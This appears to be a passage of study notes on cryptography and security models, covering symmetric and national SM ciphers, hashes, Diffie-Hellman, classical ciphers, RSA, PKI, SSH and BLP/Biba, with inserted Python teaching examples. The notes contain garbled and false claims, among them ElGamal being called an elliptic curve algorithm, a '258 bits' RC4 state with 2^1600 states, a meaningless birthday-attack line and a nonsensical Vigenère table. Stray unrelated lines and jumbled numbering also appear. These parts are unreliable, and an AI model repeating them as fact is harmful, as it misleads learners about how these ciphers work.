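AES_POLY_LOW = 0x1B  # low byte of x^8 + x^4 + x^3 + x + 1


def gf_mul(a: int, b: int) -> int:
    """Multiply two bytes in GF(2^8) modulo the AES polynomial."""
    result = 0
    for _ in range(8):
        if b & 1:
            result ^= a
        carry = a & 0x80
        a = (a << 1) & 0xFF
        if carry:
            a ^= AES_POLY_LOW
        b >>= 1
    return result


def gf_inv(a: int) -> int:
    """Multiplicative inverse in GF(2^8); AES defines the inverse of 0 as 0."""
    if a == 0:
        return 0
    result, power, exp = 1, a, 254  # a^254 == a^-1 (group order is 255)
    while exp:
        if exp & 1:
            result = gf_mul(result, power)
        power = gf_mul(power, power)
        exp >>= 1
    return result


def rotl8(x: int, n: int) -> int:
    """Rotate an 8-bit value left by n bits."""
    return ((x << n) | (x >> (8 - n))) & 0xFF


def build_sbox() -> list:
    """S(x) = affine(inverse(x)), the non-linear layer of AES."""
    table = []
    for value in range(256):
        inv = gf_inv(value)
        table.append(inv ^ rotl8(inv, 1) ^ rotl8(inv, 2)
                     ^ rotl8(inv, 3) ^ rotl8(inv, 4) ^ 0x63)
    return table


SBOX = build_sbox()

# The substitution is reversible, so the inverse table exists.
INV_SBOX = [0] * 256
for _index, _value in enumerate(SBOX):
    INV_SBOX[_value] = _index


def sub_byte(byte: int) -> int:
    """High nibble selects the row, low nibble selects the column."""
    row, col = byte >> 4, byte & 0x0F
    return SBOX[16 * row + col]


def sub_bytes(state: bytes) -> bytes:
    """Apply the S-box to every byte of the state."""
    return bytes(sub_byte(b) for b in state)


def inv_sub_bytes(state: bytes) -> bytes:
    """Undo sub_bytes using the inverse table."""
    return bytes(INV_SBOX[b] for b in state)


if __name__ == "__main__":
    state = bytes.fromhex("5167")          # the two bytes used in the notes
    print(sub_bytes(state).hex())
    for row in range(16):                   # print the table the figure showed
        print(" ".join(f"{SBOX[16 * row + col]:02x}" for col in range(16)))
```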

IDEA (International Data Encryption Algorithm): the block length is 64 bits and the key length is 128 bits. The same algorithm is used for encryption and decryption. It is mainly used for PGP email and can also be used as a data encryption algorithm.

The IDEA algorithm processes 64-bit blocks. The same algorithm can be used for both encryption and decryption. The design idea of the algorithm is to "mix operations from different algebraic groups."

PGP email security: RSA is used for key management, IDEA is used for data encryption, and MD5 and RSA are used for integrity and digital signature algorithms.

PGP applies a variety of cryptographic technologies: key management uses RSA, data encryption uses IDEA, and integrity checking and digital signatures use MD5 and RSA together with a random number generator. PGP integrates these cryptographic technologies and uses the respective advantages of symmetric and asymmetric encryption algorithms to implement a relatively complete cryptosystem.

SM1: domestic symmetric cipher; the block length and key length are both 128 bits. The security strength of the algorithm and the performance of its software and hardware implementations are comparable to AES.

SM4: domestic symmetric cipher; the block length and key length are both 128 bits, and both the encryption algorithm and the key expansion algorithm adopt a 32-round nonlinear iteration structure. It is used by national wireless LAN products.
The data processing units are bytes (8 bits) and words (32 bits).
The cipher is an involution (the encryption and decryption algorithms are the same); it takes 32 round keys as input and outputs a 128-bit ciphertext, i.e. 4 words.
Algorithm structure: the round function is iterated 32 times, and each round uses one round key.
Cipher structure: an asymmetric Feistel structure (different from DES).
Nonlinear transformation T: first the S transformation, then the L transformation.
Word linear component, the L transform: provides diffusion; 32-bit input and output.
Round function: the input data is 128 bits (four 32-bit words) plus a round key rk (a 32-bit word); the output is also a 32-bit word.
Key expansion algorithm: the constant FK; some constant 32-bit words are used in key expansion.

S-box non-linear byte transformation: 8-bit input and output; the high nibble is the row number and the low nibble is the column number, and four S-boxes are used for parallel substitution. Formula: b=s_box(a)
For example: suppose the S-box input is EF; then E is the row and F is the column, and their intersection is the result: sbox('ef')='84'
AES, DES, and SM4 all use non-linear S-boxes. Comparison:
AES consists of 16 S boxes, the operation is reversible, and the output and input are the same.
DES consists of 8 S-boxes, and the operation is irreversible. Each S-box input is 6 bits and the output is 4 bits.
SM4 is composed of 4 S boxes.

What are the problems with symmetric cryptosystems:
key distribution problems, key number problems, and digital signature problems.

Public key cryptography security: ensures data confidentiality and data authenticity at the same time.

Public key cryptography:
Public key cryptography hybrid model of encryption and authentication:

Digital envelope (solve the confidentiality of data in transmission):

Digital signature:
Digital signature is based on a combination of public key cryptography and one-way secure hash function algorithm.
Digital signature: verifies the authenticity, unforgeability, unalterability and non-repudiation of the signature, and the integrity of the message.


ElGamal cryptography, also called elliptic curve algorithm, contains three parts: finite field, order, and primitive element.
p and q are shared by all users in the system.
Features: introducing a random number increases the uncertainty of encryption, so the same plaintext may produce different ciphertexts.
The security of the cryptosystem is based on the difficulty of the discrete logarithm problem in finite fields. The random number used in encryption must be one-time.

RC4 sequence cipher:
It is a sequence cipher based on non-linear data table transformation. It consists of the key
scheduling algorithm (KSA for short) and the pseudo-random generation algorithm (PRGA for short).
Storage space: 258 bits: the 256-byte S-box table plus the two pointers I and J (2 bytes), a total of 258 bits. The S-box, I, and J together are called the state machine.
It is resistant to brute force attacks because each state generates one key character, and the number of states is 2 raised to the 1600th power.
SSL, TLS, and WEP protocols all use the RC4 algorithm.

ZUC Zu Chongzhi algorithm, used in mobile communications, is the core of 3GPP confidentiality algorithm EEA3 and integrity algorithm EIA3.

SM9: identity-based cryptographic algorithm. SM9 is mainly used for user identity authentication. The encryption strength of SM9 is equivalent to the RSA encryption algorithm with a 3072-bit key.

5. Asymmetric:
RSA: The RSA key is at least 500 bits long, and 1024 bits is generally recommended. Mainly used for key management and data signing.

SM2: Asymmetric encryption, used for key exchange, digital signature, using prime field 256-bit ECC elliptic curve cryptography mechanism.

The difference between RSA and ECC: the content after an RSA signature is encrypted ciphertext, while an ECC signature uses the key to generate two numbers and appends them to the original plaintext before sending them together.

6. Authentication algorithm: tamper-proofing, integrity check (2 types of hash authentication):
MD5: data block length 512 bits; the message digest algorithm outputs a 128-bit hash value.

Hash function: formula h=H(M). Also known as a message digest or hash function, it has error detection capability: changing any one or more bits of the message changes the hash result.

The hash function provides confidentiality, message authentication, and digital signatures.

Basic attributes of hash:
One-way: the corresponding message cannot be deduced from the hash code; this provides confidentiality.
Finding x from h is computationally infeasible.

Weak collision resistance: another message with the same hash value as a given message cannot be found; this supports message authentication and digital signatures.
For a given x, finding y with h(x)=h(y) is computationally infeasible.

Strong collision resistance: resists the birthday attack (a group of more than 50 people, the same relationship is N=3)
Finding any pair (x, y) with h(x)=h(y) is computationally infeasible.

hash structure:

SHA-1: the Secure Hash Algorithm
outputs a 160-bit hash value; the input message block length is 512 bits, and the input message length cannot exceed 2 to the 64th power.

The SHA-1 algorithm uses a 160-bit buffer to store intermediate results and the final digest. The buffer consists of five 32-bit registers A, B, C, D, and E, which add up to 160 bits.

Compression function processing: 4 rounds of compression, with 20 operations in each round (f1, f2, f3, f4), repeated until the last 512-bit block has been processed.
Compression function processing: Ft(B, D, C) is the basic logic function used in step t. The input is 96 bits and the output is 32 bits.

Message padding: the padded length must satisfy (448 + X) mod 512 = 448, which means that the remainder after dividing the left-hand number by 512 is 448.

sha1 structure:
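The SHA-1 structure described above (padding to 448 mod 512, the five 32-bit registers A to E, and 4 rounds of 20 steps over each 512-bit block), written out as an added example that is not part of the original notes. It follows the public SHA-1 specification; function names are chosen here, and the sample messages are constructed.

```python
"""SHA-1 from its building blocks: padding, five registers, 4 x 20 steps."""
import hashlib
import struct

MASK32 = 0xFFFFFFFF


def sha1_pad(message: bytes) -> bytes:
    """Append 0x80, zero bytes up to 448 mod 512 bits, then the 64-bit length."""
    bit_length = len(message) * 8
    padded = message + b"\x80"
    padded += b"\x00" * ((56 - len(padded) % 64) % 64)   # 56 bytes = 448 bits
    return padded + struct.pack(">Q", bit_length)


def rotl32(x: int, n: int) -> int:
    """Rotate a 32-bit word left by n bits."""
    return ((x << n) | (x >> (32 - n))) & MASK32


def f_t(t: int, b: int, c: int, d: int):
    """Logic function and constant for step t: 96 bits in, 32 bits out."""
    if t < 20:
        return (b & c) | (~b & d), 0x5A827999          # round 1 (f1)
    if t < 40:
        return b ^ c ^ d, 0x6ED9EBA1                   # round 2 (f2)
    if t < 60:
        return (b & c) | (b & d) | (c & d), 0x8F1BBCDC  # round 3 (f3)
    return b ^ c ^ d, 0xCA62C1D6                       # round 4 (f4)


def sha1(message: bytes) -> bytes:
    """Return the 160-bit digest of message."""
    # Initial contents of registers A, B, C, D, E (5 x 32 = 160 bits).
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0]
    data = sha1_pad(message)
    for offset in range(0, len(data), 64):             # one 512-bit block
        w = list(struct.unpack(">16I", data[offset:offset + 64]))
        for t in range(16, 80):                        # message schedule
            w.append(rotl32(w[t - 3] ^ w[t - 8] ^ w[t - 14] ^ w[t - 16], 1))
        a, b, c, d, e = h
        for t in range(80):                            # 4 rounds x 20 steps
            f, k = f_t(t, b, c, d)
            temp = (rotl32(a, 5) + f + e + k + w[t]) & MASK32
            a, b, c, d, e = temp, a, rotl32(b, 30), c, d
        h = [(x + y) & MASK32 for x, y in zip(h, (a, b, c, d, e))]
    return struct.pack(">5I", *h)


if __name__ == "__main__":
    for sample in (b"", b"abc", b"a" * 55, b"a" * 56, b"a" * 200):
        assert sha1(sample) == hashlib.sha1(sample).digest()
        print(len(sample), len(sha1_pad(sample)) * 8, sha1(sample).hex())
```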

SM3: the hash algorithm is equivalent to SHA-1:
the hash value length is 256 bits and the data block length is 512 bits. The hash algorithm standard gives the calculation method and calculation steps of the hash function algorithm, and gives operation examples. This algorithm is suitable for digital signature and verification, message authentication code generation and verification, and random number generation in commercial cryptographic applications.

7. Pre-shared key: identity authentication, anti-impersonation; that is, a password (password: a combination of uppercase and lowercase letters and digits)

8. DH algorithm: used to protect the security of password transmission on the Internet and to encrypt passwords (it mixes asymmetric and symmetric algorithms: first the asymmetric computation gives both sides the same value, then symmetric encryption is used with it, so the password itself is never transmitted online)

The DH key exchange protocol is based on the difficulty of solving the discrete logarithm problem.

The DH (Diffie-Hellman) algorithm is asymmetric encryption.

The DH key exchange protocol is vulnerable to man-in-the-middle attacks.
DH formula: C^d mod P = M. Knowing C and P, it is easy to compute M from d. d is the random number chosen by each party.

C and P can be generated by either party, P needs to be a large enough prime number, C can be a smaller integer, and C and P do not need to be kept secret.

The last 2 in the figure below is a shared key that both parties want to obtain. Replace all G in the picture below with C in the formula above
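An added example (not from the original notes) of the exchange M = C^d mod P, combined with the pre-shared key from item 7 to authenticate each public value, which is the piece plain DH lacks. The toy parameters P=23, C=5 and the exponents 6 and 15 are assumptions chosen so that the shared key is 2, the value the text mentions; the HMAC tagging scheme and all function names are illustrative, not a standardized protocol.

```python
"""Diffie-Hellman with the notes' symbols, plus PSK authentication of M."""
import hashlib
import hmac

P = 23   # public prime (toy size; a real P must be a large prime)
C = 5    # public base
PSK = b"constructed-demo-psk"  # pre-shared key, constructed for this example


def public_value(d: int) -> int:
    """M = C^d mod P, sent to the peer; d stays secret."""
    return pow(C, d, P)


def shared_secret(peer_m: int, d: int) -> int:
    """Both sides compute peer_M^d mod P and obtain the same number."""
    return pow(peer_m, d, P)


def session_key(secret: int) -> bytes:
    """Turn the shared number into a symmetric key for the second phase."""
    size = (P.bit_length() + 7) // 8
    return hashlib.sha256(secret.to_bytes(size, "big")).digest()


def make_tag(psk: bytes, sender: str, m: int) -> bytes:
    """HMAC over the sender name and its public value."""
    return hmac.new(psk, f"{sender}|{m}".encode(), hashlib.sha256).digest()


def accept(psk: bytes, sender: str, m: int, tag: bytes) -> bool:
    """Receiver-side check: sane range and a valid tag under the PSK."""
    in_range = 1 < m < P - 1
    return in_range and hmac.compare_digest(tag, make_tag(psk, sender, m))


def exchange(d_a: int, d_b: int, psk: bytes = PSK,
             substitute_for_a=None, authenticate: bool = True):
    """Run A<->B once and return (key_at_A, key_at_B), or None if rejected.

    substitute_for_a models a value replaced in transit by a party that
    does not know the PSK, so the original tag no longer matches.
    """
    m_a, m_b = public_value(d_a), public_value(d_b)
    msg_a = ("A", m_a, make_tag(psk, "A", m_a))
    msg_b = ("B", m_b, make_tag(psk, "B", m_b))
    if substitute_for_a is not None:
        msg_a = ("A", substitute_for_a, msg_a[2])
    if authenticate and not (accept(psk, *msg_a) and accept(psk, *msg_b)):
        return None
    return shared_secret(msg_b[1], d_a), shared_secret(msg_a[1], d_b)


if __name__ == "__main__":
    print(exchange(6, 15))                                  # (2, 2)
    print(exchange(6, 15, substitute_for_a=11,
                   authenticate=False))                     # keys disagree
    print(exchange(6, 15, substitute_for_a=11))             # None: rejected
    print(session_key(2).hex())
```

Without the tag check the two sides silently end up with different keys; with it, the substituted value is rejected before any key is derived.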

9. Symmetric cipher is also called block encryption

M represents plain text, C represents cipher text, K key space, e encryption algorithm, d decryption algorithm, Ke represents encryption key, and Kd represents decryption key.

All the mod operations below mean taking the remainder. If the number in front of mod is smaller than the number after it, the quotient is 0 and the result equals the number in front. For example: 12 mod 33 = 12

10. The transposition (permutation) cipher (one of the classical cryptosystems)
rearranges letter positions by reading vertically (it cannot withstand known-plaintext attacks),
for example: plaintext: love you

love
you

Ciphertext: ly oo vu e0 (fill in 0 where there is no letter), remember to write a vertical line between 0

11. Substitution ciphers (also classical ciphers): additive cipher, multiplicative cipher and affine cipher. These three are vulnerable to exhaustive attacks.
Additive cipher formula: (a+k) mod n, with 0<k<n. a is the plaintext letter, k is given in the question, and n is 26 because there are only 26 letters. mod means dividing the two numbers and keeping the integer remainder rather than a decimal quotient. For example, 200 mod 26 = 18
For example, given the plaintext love: counting the 26 letters from position 0 (the additive cipher counts from position 0), l is at position 11, o at position 14, v at position 21 and e at position 4. Substitute each of these numbers for a in the formula above. The results are again positions among the 26 letters (counting from 0), and writing out the corresponding letters gives the ciphertext.

The famous additive cipher is the Caesar cipher. The Caesar cipher uses K=3, which means that all letters are shifted back by 3 places. If you go past the last letter z, wrap around to a and continue counting until 3 places have been counted.

Multiplicative cipher formula: (a*k) mod n, where k must be relatively prime with n. By default n is the number of letters, 26. Letter positions are the same as for the additive cipher above and also start from 0. For example: plaintext ab, with the default K=5
according to the formula (a*k) mod 26: for a, substitute (0*5) mod 26 = 0, so a is still 0 after encryption, and position 0 is the first letter a; then for b, substitute (1*5) mod 26 = 5, so the letter at position 5 is f (remember that positions are counted from 0). So the ciphertext of plaintext ab is af

Affine cipher formula (a combination of the additive cipher and the multiplicative cipher, also one of the classical ciphers):
(a*k0 + k1) mod n, with 0<=k1<n and 0<k0<n; k0 and n must be relatively prime, that is, gcd(k0,n)=1. k0 cannot be equal to 1, and n generally defaults to 26.
Letter positions are the same as for the additive cipher above and also start from 0.
For example: encrypt hot with K=(7, 3):
(7*7+3) mod 26 = 0, H is at position 7
(7*14+3) mod 26 = 23, O is at position 14
(7*19+3) mod 26 = 6, T is at position 19
The final result is: 0 23 6. The corresponding letters among the 26 give the ciphertext axg
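The additive, multiplicative and affine ciphers above are one formula, (a*k0 + k1) mod 26, so this added example (not from the original notes) implements all three with one function, adds decryption through the modular inverse of k0, and counts the whole key space to show why the notes call them vulnerable to exhaustive attack. Function names are chosen here for illustration.

```python
"""Additive, multiplicative and affine ciphers over the 26 letters."""
from math import gcd
import string

ALPHABET = string.ascii_lowercase   # positions are counted from 0
N = len(ALPHABET)                   # n = 26


def affine_encrypt(plaintext: str, k0: int, k1: int) -> str:
    """c = (a*k0 + k1) mod 26 for every letter; other characters pass through."""
    if gcd(k0, N) != 1:
        raise ValueError("k0 must be relatively prime with 26")
    out = []
    for ch in plaintext.lower():
        if ch in ALPHABET:
            a = ALPHABET.index(ch)
            out.append(ALPHABET[(a * k0 + k1) % N])
        else:
            out.append(ch)
    return "".join(out)


def affine_decrypt(ciphertext: str, k0: int, k1: int) -> str:
    """a = k0^-1 * (c - k1) mod 26; the inverse exists because gcd(k0, 26) = 1."""
    if gcd(k0, N) != 1:
        raise ValueError("k0 must be relatively prime with 26")
    k0_inv = pow(k0, -1, N)          # modular inverse (Python 3.8+)
    out = []
    for ch in ciphertext.lower():
        if ch in ALPHABET:
            c = ALPHABET.index(ch)
            out.append(ALPHABET[(k0_inv * (c - k1)) % N])
        else:
            out.append(ch)
    return "".join(out)


def additive_encrypt(plaintext: str, k: int) -> str:
    """Additive cipher (Caesar is k = 3): the affine cipher with k0 = 1."""
    return affine_encrypt(plaintext, 1, k)


def multiplicative_encrypt(plaintext: str, k: int) -> str:
    """Multiplicative cipher: the affine cipher with k1 = 0."""
    return affine_encrypt(plaintext, k, 0)


def affine_keys() -> list:
    """Every valid (k0, k1): 12 values of k0 coprime to 26, times 26 shifts."""
    return [(k0, k1) for k0 in range(1, N) if gcd(k0, N) == 1
            for k1 in range(N)]


def keys_consistent_with(ciphertext: str, known_plaintext: str) -> list:
    """Exhaustive search: which keys map the known plaintext to the ciphertext."""
    return [key for key in affine_keys()
            if affine_encrypt(known_plaintext, *key) == ciphertext]


if __name__ == "__main__":
    print(affine_encrypt("hot", 7, 3))          # worked example from the notes
    print(multiplicative_encrypt("ab", 5))
    print(additive_encrypt("love", 3))
    print(len(affine_keys()), keys_consistent_with("axg", "hot"))
```

The whole key space is 312 keys, and one short known plaintext narrows it to a single key.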

12. Simple substitution ciphers (vulnerable to statistical analysis attacks) include: additive cipher and multiplicative cipher

13. Polyalphabetic substitution cipher: the Vigenère cipher (also one of the classical ciphers)
uses a two-dimensional table to get the ciphertext, with the plaintext letter at the head of the column and the key letter at the head of the row. The intersection of the two is the ciphertext.
For example, if the plaintext is c and the key is b:
abc
bhf
ckl
the ciphertext is f

14. Algebraic cipher (also one of the classical ciphers): first convert the letters of the plaintext and the key into their ASCII codes, convert these numbers into binary, and perform the logical XOR operation to obtain the ciphertext in binary, which is then converted back into the corresponding ASCII characters to get the ciphertext.
Example:
plain text: data 1000100 1000001 1010100 1000001
key: lamb 1001100 1000001 1001101 1000010
cipher text: 0001000 0000000 0011001 0000011

15. Asymmetric encryption RSA
The security of the RSA cryptosystem is based on the difficulty of factoring large integers.
Features: The encryption and decryption algorithm is reversible, ensuring the confidentiality and authenticity of the data.
The international Trusted Computing Group (TCG) stipulates in the trusted computing standard that the encryption key and authentication key should be 1024 bits, and the platform root key and storage root key should be 2048 bits.

The RSA algorithm is based on the difficulty of factoring large integers.

The RSA digital signature does not sign the plaintext, but signs hash(M). It uses a timestamp, and the message is signed first and then encrypted.

The multiplicative inverse used in an RSA digital signature must exist, because the RSA formula is: e * d ≡ 1 mod φ(n). The
multiplicative inverse is the private key d.

RSA digital signature verification: given p=5, q=17, e=5 and the message to be signed x=10, calculate the signature y and verify the validity of the signature.
Solution: n = p*q = 85
φ(n) = (p-1)*(q-1) = 64
Because e=5, gcd(64, 5) = 1 holds, i.e. 64 and 5 are relatively prime, so the digital signature is valid,
and d satisfies the RSA formula e*d ≡ 1 mod φ(n), so d=13

Randomly generate two large numbers p and q
n = p*q; p and q must be mutually prime
φ(n) = (p-1)*(q-1), that is, the number of integers smaller than n and relatively prime with n
e: a random number that must satisfy the conditions 1<e<φ(n) and be relatively prime with φ(n)
d: private key

Common formulas such as 15 ≡ 2 (mod 13) mean that 15 and 2 are congruent modulo 13. To put it bluntly, the remainders of 15 divided by 13 and 2 divided by 13 are the same.

a=17, b=2: a modulus for which a and b are congruent is 5, which means that 17 divided by 5 and 2 divided by 5 leave the same remainder.

The inverse of 67 mod 119 is 16.
Formula: e*d ≡ 1 mod φ(n)
67 is the e in this formula and φ(n) is 119, so by substitution into (e*d - 1) mod φ(n) = 0 the final result is 16

p, q, d and φ(n): these 4 are private and must be kept to yourself,
and e and n are the public key that needs to be made public.

Encryption formula: C = M^e mod n
Decryption formula: M = C^d mod n

Examinations generally require calculating d. The formula is:
e*d ≡ 1 mod φ(n)

The first and simplest method:
given p=7, q=13, e=5 and plaintext m=10, find the private key d and output the ciphertext:
first calculate φ(n): φ(n) = (7-1) * (13-1)
so φ(n) is equal to 72,
then use the formula (e*d - 1) mod φ(n) = 0
and substitute d = 1, 2, 3, ... in turn until e*d - 1 is evenly divisible by φ(n).
This gives d = 29.
Then use the encryption formula C = M^e mod n; the final remainder is the ciphertext.

The second algorithm:
For example:
φ(n) = 72, e=5. Find d:

e*d ≡ 1 mod φ(n)
≡ means congruence: the remainders on both sides are equal.

5*d mod 72 ≡ 1 mod 72
from which we obtain

5*d mod 72 = 1

(5*d)/72 = X remainder 1
where X stands for the quotient

5*d = 72X+1

d = (72X+1)/5
Substitute X = 1, 2, 3, ... one by one until 72X+1 is divisible by 5.

d = 29
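The RSA calculations above, carried through in code as an added example that is not part of the original notes: both hand methods for finding d, the extended Euclidean algorithm that replaces trial substitution for large numbers, and the signature y for the p=5, q=17 exercise, which the notes leave uncomputed. Function names are chosen here; the numbers are the textbook-sized ones from the notes.

```python
"""Textbook RSA with the small numbers used in the notes."""
from math import gcd


def find_d_by_trial(e: int, phi: int) -> int:
    """First method: try d = 1, 2, 3, ... until (e*d - 1) mod phi == 0."""
    for d in range(1, phi):
        if (e * d - 1) % phi == 0:
            return d
    raise ValueError("no inverse: e and phi are not relatively prime")


def find_d_by_quotient(e: int, phi: int) -> int:
    """Second method: try X = 1, 2, 3, ... until phi*X + 1 is divisible by e."""
    if gcd(e, phi) != 1:
        raise ValueError("no inverse: e and phi are not relatively prime")
    x = 1
    while (phi * x + 1) % e != 0:
        x += 1
    return (phi * x + 1) // e


def extended_gcd(a: int, b: int):
    """Return (g, s, t) with a*s + b*t == g == gcd(a, b)."""
    old_r, r = a, b
    old_s, s = 1, 0
    old_t, t = 0, 1
    while r:
        q = old_r // r
        old_r, r = r, old_r - q * r
        old_s, s = s, old_s - q * s
        old_t, t = t, old_t - q * t
    return old_r, old_s, old_t


def mod_inverse(e: int, phi: int) -> int:
    """d with e*d = 1 (mod phi); the method that scales to real key sizes."""
    g, s, _ = extended_gcd(e, phi)
    if g != 1:
        raise ValueError("no inverse: e and phi are not relatively prime")
    return s % phi


def rsa_keygen(p: int, q: int, e: int):
    """Return (n, phi, d). (e, n) is public; p, q, phi and d stay private."""
    n, phi = p * q, (p - 1) * (q - 1)
    if not 1 < e < phi:
        raise ValueError("e must satisfy 1 < e < phi(n)")
    return n, phi, mod_inverse(e, phi)


def rsa_encrypt(m: int, e: int, n: int) -> int:
    return pow(m, e, n)            # C = M^e mod n


def rsa_decrypt(c: int, d: int, n: int) -> int:
    return pow(c, d, n)            # M = C^d mod n


def rsa_sign(x: int, d: int, n: int) -> int:
    """y = x^d mod n. In practice x is hash(M), not the message itself."""
    return pow(x, d, n)


def rsa_verify(x: int, y: int, e: int, n: int) -> bool:
    """The signature is valid when y^e mod n gives back x."""
    return pow(y, e, n) == x


if __name__ == "__main__":
    n, phi, d = rsa_keygen(5, 17, 5)
    y = rsa_sign(10, d, n)
    print(n, phi, d, y, rsa_verify(10, y, 5, n))
    n2, phi2, d2 = rsa_keygen(7, 13, 5)
    c = rsa_encrypt(10, 5, n2)
    print(n2, phi2, d2, c, rsa_decrypt(c, d2, n2))
    print(mod_inverse(67, 119))
```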

16. Digital signatures have three requirements:
non-repudiation, authenticity, and message integrity.
The digital signature system consists of two parts: signature algorithm and verification algorithm.
Digital signatures can only detect tampering and forgery, but cannot guarantee data accuracy.
A digital signature is a binary string

17. What technologies does key management include:
key generation, reserve, distribution, use, update, revocation, backup, recovery, destruction, and auditing.


18. Digital certification:

Directory server: provides directory browsing
OCSP server: online certificate status query.
Registration server: Registration certificate.
Issuing server: uses the private key in the digital certificate to sign the issued certificate.

Digital certificates are divided into categories: personal certificates, institutional certificates, and device certificates.
According to their uses, digital certificates are divided into signature certificates and encryption
certificates. Signature certificates are mainly used to sign user information to ensure the validity and non-repudiation of information.
Encryption certificates are mainly used to encrypt information transmitted by users to ensure the confidentiality and integrity of information.

Certificate validity is mainly based on the certificate signature contained in the digital certificate

In the PKI system, the way to ensure that digital certificates are not tampered with is to use the CA’s private key to sign the digital certificate.

The core of the project management method is the combination of risk management and goal management

20. The SSH protocol is based on the public key cryptography system and is generally susceptible to man-in-the-middle attacks and denial of service attacks. The algorithms used are: DH, SHA, RSA.

SSH is a security protocol based on the application layer

The working mechanism of SSH is divided into 7 steps, as shown in Figure 3-9. Currently, users
have three methods to authenticate the authenticity of the server's public key. The first is that the user carries a copy of the server's public key and reads it into the client computer before performing the key exchange protocol; the second is that, after downloading the server's public key and its corresponding fingerprint from a public channel, the user first verifies the authenticity of the server's public key fingerprint by telephone, then uses hash software to generate a new fingerprint of the server's public key and compares the downloaded fingerprint with the newly generated one. If they are the same, the server's public key is authentic; otherwise, the server's public key is false. The third method is to verify the server through PKI technology.

SSH protocol:
Transport layer protocol: server authentication, data confidentiality, and information integrity protection.
User Authentication Protocol: As the unique identifier of this session.
Connection Protocol: Provides interactive sessions, and all session connections are implemented through tunnels.
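The second verification method described above (hash the downloaded server public key and compare it with a fingerprint confirmed out of band), as an added example that is not part of the original notes. It uses the SHA256 fingerprint format that OpenSSH prints; the key line is constructed for the example and is not a real host key, and the function names are illustrative.

```python
"""Recompute an SSH public key fingerprint and compare it with a trusted one."""
import base64
import hashlib
import hmac
import struct


def ssh_string(data: bytes) -> bytes:
    """SSH wire format: 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


# Constructed sample: an ed25519-shaped key blob with placeholder key bytes.
SAMPLE_BLOB = ssh_string(b"ssh-ed25519") + ssh_string(bytes(range(32)))
SAMPLE_LINE = ("ssh-ed25519 " + base64.b64encode(SAMPLE_BLOB).decode()
               + " server.example")


def parse_public_key(line: str) -> bytes:
    """Return the decoded key blob from a '<type> <base64> [comment]' line."""
    fields = line.split()
    if len(fields) < 2:
        raise ValueError("expected '<type> <base64> [comment]'")
    key_type, encoded = fields[0], fields[1]
    blob = base64.b64decode(encoded, validate=True)
    if len(blob) < 4:
        raise ValueError("key blob too short")
    (name_len,) = struct.unpack(">I", blob[:4])
    if blob[4:4 + name_len] != key_type.encode():
        raise ValueError("key type in blob does not match the declared type")
    return blob


def fingerprint(line: str) -> str:
    """SHA256:<unpadded base64 of SHA-256 over the key blob>."""
    digest = hashlib.sha256(parse_public_key(line)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def matches_trusted_fingerprint(line: str, trusted: str) -> bool:
    """True only if the downloaded key hashes to the fingerprint you trust."""
    return hmac.compare_digest(fingerprint(line), trusted.strip())


if __name__ == "__main__":
    trusted = fingerprint(SAMPLE_LINE)      # stands in for the value read out by phone
    print(trusted)
    print(matches_trusted_fingerprint(SAMPLE_LINE, trusted))
    altered = ssh_string(b"ssh-ed25519") + ssh_string(bytes(range(1, 33)))
    altered_line = "ssh-ed25519 " + base64.b64encode(altered).decode()
    print(matches_trusted_fingerprint(altered_line, trusted))
```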

Classical ciphers: transposition cipher, Caesar cipher, additive cipher, multiplicative cipher, affine cipher, simple substitution cipher, polyalphabetic substitution cipher (Vigenère cipher), algebraic cipher.

There are several uncommon symmetric ciphers: RC4, IDEA

Cipher summary:
According to how the plaintext is processed, ciphers are divided into two types: block ciphers and sequence ciphers.
The differences are:
The plaintext processing unit is different: a block cipher divides the plaintext into several blocks and encrypts them separately, while a sequence cipher processes the plaintext as a sequence of bits or characters.
The keys used are different: block ciphers use the same initial key to encrypt each plaintext block, and sequence ciphers use different keys to encrypt the plaintext sequence.

Block cipher: encrypts one block of plaintext at a time, and the ciphertext depends only on the encryption algorithm and the key.
Sequence cipher: encrypts one bit or one character at a time; the ciphertext depends not only on the encryption algorithm and the key but also on the position of the encrypted plaintext part within the whole plaintext.

Block cipher: there are two structures, the Feistel structure and the SP structure. SP is a generalization of Feistel.

Block ciphers include: DES, 3DES, AES, SM4
Sequence ciphers include: RC4, ZUC

Data link layer function: Convert the original transmission line into a logical transmission line, ensure correct binary transmission between actual entities, and ensure the correct order, error-free and complete data.

4. 1. Network security system:
The main characteristics of the network system: integrity, collaboration, process, comprehensiveness, and adaptability.
Use a comprehensive collaborative process to adapt to the whole.

2. BLP confidentiality model: write up (* property), read down (simple property), also called the state machine model

3. Biba integrity model: cannot read down (simple property), cannot write up (* property), invocation property (when the integrity of a subject is lower than the integrity of another subject, it cannot invoke the other subject)

Integrity models include: Biba, Clark-Wilson, DTE

Chinese wall model: allow subject access

The information flow model can be used to analyze the covert channels of the system to prevent sensitive information from being leaked through covert channels. Covert channels usually manifest as low-security level subjects indirectly reading information generated by high-security level subjects. Covert channels are discovered through information flow analysis to prevent information leakage.

4. Data security capability maturity model

Data security capabilities are evaluated from the four dimensions of organizational construction, institutional processes, technical tools and personnel capabilities:
• Organizational construction: the establishment of the data security organization's structure, the allocation of responsibilities, and communication and collaboration;
• Institutional processes: the construction of institutional norms and process implementation in the organization's key data security areas;
• Technical tools: solidify security requirements or automate security work through technical means and product tools;
• Personnel capabilities: the awareness and professional capabilities of the personnel who perform data security work.

Evaluation from the four perspectives of organizational construction, institutional processes, technical tools, and personnel capabilities.
Organizational construction is based on institutional processes and uses technical tools to improve personnel work capabilities.
5. Software security capability maturity model
The software security capability maturity model is divided into five levels. The main processes at each level are as follows:
• CMM1 level - patching;
• CMM2 level - penetration testing, security code review;
• CMM3 level - vulnerability assessment, code analysis, secure coding standards;
• CMM4 level - software security risk identification, SDLC with different security checkpoints;
• CMM5 level - improve software security risk coverage and assess security gaps.

The Capability Maturity Model (CMM for short) is a model for assessing the maturity of an organization's capabilities. Maturity levels are generally divided into five levels: Level 1 - informal execution, Level 2 - plan tracking, Level 3 - fully defined, Level 4 - quantitative control, and Level 5 - continuous optimization. The higher the level, the higher the maturity of the capability. The definitions of each level are as follows:
• Level 1 - informal execution: has a random, disorderly, passive process;
• Level 2 - plan tracking: has an active, non-systematic process;
• Level 3 - fully defined: has a formal, standardized process;
• Level 4 - quantitative control: has a quantifiable process;
• Level 5 - continuous optimization: has a process that can be continuously optimized.
At present, the maturity models in network security mainly include SSE-CMM, data security capability maturity model, software security capability maturity model, etc.

